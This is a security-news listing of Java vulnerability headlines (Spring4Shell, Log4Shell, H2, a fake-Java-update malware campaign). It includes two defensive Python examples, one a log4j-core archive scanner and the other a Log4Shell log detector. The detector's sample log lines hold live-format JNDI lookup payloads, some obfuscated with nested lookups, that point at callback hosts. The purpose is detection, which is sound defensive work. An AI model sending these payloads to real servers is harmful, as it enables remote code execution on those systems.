Security News

Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security
2022-03-31 08:27

A zero-day remote code execution vulnerability has come to light in the Spring framework shortly after a Chinese security researcher briefly leaked a proof-of-concept exploit on GitHub before deleting their account. According to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit versions 9 and later and is a bypass for another vulnerability tracked as CVE-2010-1622, enabling an unauthenticated attacker to execute arbitrary code on the target system.

“VMware Spring Cloud Function” Java bug gives instant remote code execution – update now!
2022-03-30 20:38

VMware Spring is an open-source Java toolkit for building powerful Java apps, including cloud-based apps, without needing to write, manage, worry about, or even understand the "server" part of the process yourself. You don't need to worry about, or even care, what sort of server your code is running on: it could be a server of your own, set up and managed by your colleagues in IT, or a cloud instance hosted and executing on a popular cloud service provider.

New Spring Java framework zero-day allows remote code execution
2022-03-30 20:16

A new zero-day vulnerability in the Spring Core Java framework, dubbed 'Spring4Shell', has been publicly disclosed, allowing unauthenticated remote code execution on affected applications. Spring is a very popular application framework that allows software developers to quickly and easily develop Java applications with enterprise-level features.

Log4Shell-like security hole found in popular Java SQL database engine H2
2022-01-07 19:32

This time, the bug isn't in Apache's beleaguered Log4j toolkit, but in the H2 Database Engine, a popular SQL database written in Java. H2 is designed to be embedded: you can bundle the database code right into your own Java apps and run your databases entirely in memory, with no need for separate server processes.

Java Code Repository Riddled with Hidden Log4j Bugs; Here’s Where to Look
2021-12-21 20:46

There's an enormous amount of software vulnerable to the Log4j bug through Java software supply chains, and administrators and security pros likely don't even know where to look for it. About 17,000 Java packages in the Maven Central repository, the most significant collection of Java packages available to developers, are vulnerable to Log4j, and it will likely take "years" for it to be fixed across the ecosystem, according to Google security.
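Knowing "where to look" in practice means opening every jar, WAR and EAR on a host, because log4j-core is usually pulled in transitively and often ends up nested inside a fat jar. The scanner below is an added example written for this page, not Google's tooling or anything from the article: it recurses into nested archives, flags any archive that still contains the JndiLookup class the exploit abuses, and reports the log4j-core version from Maven's pom.properties. The fixture it scans (a WAR bundling a fake log4j-core 2.14.1 jar, plus a jar with JndiLookup.class removed) is constructed in a temporary directory so the script runs offline.

```python
"""Find log4j-core copies, including ones nested inside fat jars and WARs.

Added example for this page, not from the article or from Google's tooling.
An archive is reported when it still ships JndiLookup.class (the class the
Log4Shell lookup goes through); the version comes from Maven's pom.properties.
"""
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def _log4j_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Return the log4j-core version Maven recorded inside the archive, if any."""
    try:
        text = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
    except KeyError:
        return None
    m = re.search(r"^version=(.+)$", text, re.MULTILINE)
    return m.group(1).strip() if m else None


def scan_archive(data: bytes, label: str, findings: List[Dict[str, Optional[str]]]) -> None:
    """Inspect one archive held in memory and recurse into any archives it contains.

    `label` is the path reported for a hit; nested members are joined with '!',
    e.g. 'app.war!WEB-INF/lib/log4j-core-2.14.1.jar'.
    """
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container (or corrupt): nothing to inspect
    with zf:
        names = set(zf.namelist())
        if JNDI_LOOKUP_CLASS in names:
            findings.append({"path": label, "version": _log4j_version(zf)})
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{label}!{name}", findings)


def find_log4j(root: str) -> List[Dict[str, Optional[str]]]:
    """Walk `root` and return one finding per archive that contains JndiLookup.class."""
    findings: List[Dict[str, Optional[str]]] = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, findings)
    return findings


def build_sample_tree(root: str) -> None:
    """Constructed fixture (not real artifacts): a WAR bundling a fake
    log4j-core 2.14.1 jar, and a standalone jar from which JndiLookup.class
    has been deleted, the mitigation Apache recommended for older versions."""
    os.makedirs(root, exist_ok=True)
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        zf.writestr(POM_PROPERTIES, "version=2.14.1\ngroupId=org.apache.logging.log4j\n")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
    with zipfile.ZipFile(os.path.join(root, "stripped.jar"), "w") as zf:
        zf.writestr(POM_PROPERTIES, "version=2.14.1\n")  # no JndiLookup.class


def demo() -> List[Dict[str, Optional[str]]]:
    """Build the fixture in a temporary directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return find_log4j(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: log4j-core {f['version'] or 'unknown version'}")
```

Point find_log4j at an application directory or a whole filesystem; only the WAR's nested jar is reported for the fixture, because the stripped jar no longer carries the lookup class even though its pom.properties still says 2.14.1, which is why the check keys on the class rather than on the version string alone.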

“Log4Shell” Java vulnerability – how to safeguard your servers
2021-12-10 19:22

The bug, now officially denoted CVE-2021-44228, involves sending a request to a vulnerable server in which you include some data, for example an HTTP header, that you expect the server will write to its logfile. If that data contains a Log4j lookup string such as ${jndi:ldap://...}, Log4j resolves the lookup by connecting to the named server and downloading whatever it returns. Not just any old download: if the data that comes back is a valid Java program, then the server runs that file to "help" it generate the logging data.
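The lookup step is also what you can hunt for in your own logs, but a plain search for "jndi" misses most real probes, because attackers hide the string behind nested Log4j lookups such as ${lower:j} or ${::-j} that Log4j resolves inner-first before it ever sees "jndi". The detector below is an added example for this page, not code from the article: it normalises those nested lookups the way Log4j 2.x does (lower, upper, and the key:-default syntax, treating every variable as undefined so the default wins), then extracts the scheme and host of the callback. The access-log lines are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in access-log lines,
including the nested-lookup obfuscation seen in the wild.

Added example for this page, not from the article. Normalisation resolves
innermost ${...} lookups first, as Log4j's StrSubstitutor does.
"""
import re
from typing import Dict, List

# An innermost lookup: a ${...} whose body contains no further "${", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation: ${jndi:<scheme>://<host>...}; host stops at '/', ':', '}' or space.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*://\s*([^/}\s:]+)", re.I)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup body for the forms attackers actually use.

    Assumption (deliberately detection-friendly): every variable lookup is
    undefined, so "${env:X:-d}" and "${::-d}" both yield "d". Unknown lookups
    are over-approximated by dropping the braces and keeping the body.
    """
    if body.strip().lower().startswith("jndi:"):
        return "${" + body + "}"  # keep the payload intact so _JNDI can match it
    if ":-" in body:  # key:-default with the key assumed undefined
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return value.lower()
    if sep and prefix.strip().lower() == "upper":
        return value.upper()
    return body


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups, innermost first, until nothing changes."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per line whose normalised form contains a JNDI lookup."""
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append({"line": n, "scheme": m.group(1).lower(),
                         "host": m.group(2), "normalized": norm})
    return hits


# Constructed sample access-log lines (Apache combined format); addresses are
# documentation ranges, not real hosts.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:r}mi://198.51.100.7/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${env:NaN:-n}di:${upper:ldap}://203.0.113.4/c}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-tutorial.html?q=${price} HTTP/1.1" 200 9 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['host']}")
```

Lines 2 to 4 are reported (ldap, rmi and ldap callbacks), while line 5, which merely mentions "jndi" in a path and carries a harmless ${price} placeholder, is not. Block or alert on the extracted host, and remember that the same string can arrive in any logged field, not just the User-Agent.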

New zero-day exploit for Log4j Java library is an enterprise nightmare
2021-12-10 09:59

Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to remote code execution attacks. Log4j is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.

SmartBear expands API lifecycle development platform to backend Java developers
2021-06-16 00:45

SmartBear has released a new plug-in for SwaggerHub API design to support IntelliJ IDEA, the popular Java-based integrated developer environment. API developers familiar with IntelliJ IDEA now have ready access to the OpenAPI compliant SwaggerHub API design platform to create, organize, and document APIs.

Red Hat JBoss EAP on Azure enables the migration of Java applications to cloud environments
2021-05-27 02:00

Red Hat announced Red Hat JBoss Enterprise Application Platform on Microsoft Azure, enabling organizations to tap into the benefits of a cloud-based architecture for modernizing their existing Jakarta EE applications and building new ones on Azure. Customers can bring existing applications to Azure (including JBoss EAP applications running on-premises, or other Jakarta EE applications running on different application servers), choosing how they want to manage business-critical, Java-based applications in the cloud.

Adult site users targeted with ZLoader malware via fake Java update
2020-11-17 03:28

A malware campaign ongoing since the beginning of the year has recently changed tactics, switching from exploit kits to social engineering to target adult content consumers. Malwarebytes monitored the Malsmoke campaign all year long as it delivered Smoke Loader, a malware dropper, via the Fallout exploit kit, until its trail went cold on October 18.